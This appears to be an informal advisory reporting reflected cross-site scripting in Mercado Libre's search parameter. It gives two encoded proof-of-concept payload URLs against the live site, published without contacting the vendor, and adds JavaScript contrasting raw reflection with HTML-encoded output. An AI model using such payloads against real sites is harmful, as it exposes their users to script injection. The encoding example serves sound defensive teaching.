Mercado Libre Vulnerabilities:
Cross-Site Scripting
Cross-Agent Script
Input Validation Error
The search in mercadolibre (all countries) permits cross-site scripting attacks through the as_word parameter (search?as_display_type=G&as_word=CODE).
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser.
Live demo:
http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Ca%20href=javascript:alert('snilabs-greetz:arielutn@gmail.com')%3E%3Cimg%20src=http://www.geocities.com/promospeedy/infobugs/logo1.jpg%3E%3C/a%3E
http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Cscript%3Ealert('snilabs%20-%20%20greetz:%20arielutn@gmail.com')%3C/script%3E
Vendor Contacted: not yet.. lol

Vuln Greetz, Credits and Discovery: Ariel (arielutn@gmail.com)
Snilabs greetz: A|iazar, Dar, El_Aventurero, Cyrus, GuS, Farynrl, mmm is much.. so nothing more
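
The root cause described above is that the as_word value is written into the results page without HTML encoding. The following is an added example, not code from Mercado Libre or from the advisory's author: the function names and the page template are hypothetical, and the two URLs are the live-demo links quoted above. It shows the reflected value with and without output encoding.

```javascript
// Added example: reflecting the as_word search term, unsafe vs. HTML-encoded.
// Function names and the <h1> template are hypothetical; the two URLs are the
// live-demo links quoted in the advisory.
const DEMO_ANCHOR = "http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Ca%20href=javascript:alert('snilabs-greetz:arielutn@gmail.com')%3E%3Cimg%20src=http://www.geocities.com/promospeedy/infobugs/logo1.jpg%3E%3C/a%3E";
const DEMO_SCRIPT = "http://www.mercadolibre.com/jm/search?as_display_type=G&as_word=%3Cscript%3Ealert('snilabs%20-%20%20greetz:%20arielutn@gmail.com')%3C/script%3E";

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change HTML structure. This is correct
// for element content and quoted attribute values only; other contexts
// (unquoted attributes, inline script, URLs) need their own encoders.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pull the percent-decoded as_word value out of a request URL.
function searchTerm(requestUrl) {
  return new URL(requestUrl).searchParams.get("as_word") || "";
}

// Behaviour the advisory describes: the decoded term is concatenated into HTML.
function renderUnsafe(requestUrl) {
  return "<h1>Results for " + searchTerm(requestUrl) + "</h1>";
}

// Corrected form: the term is encoded at the point of output.
function renderSafe(requestUrl) {
  return "<h1>Results for " + escapeHtml(searchTerm(requestUrl)) + "</h1>";
}

// Rough check for whether attacker-supplied markup survived as a live tag.
function hasLiveTag(html) {
  return /<\s*(script|a|img)\b/i.test(html);
}

for (const url of [DEMO_ANCHOR, DEMO_SCRIPT]) {
  console.log("unsafe:", hasLiveTag(renderUnsafe(url)), "encoded:", hasLiveTag(renderSafe(url)));
}
```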










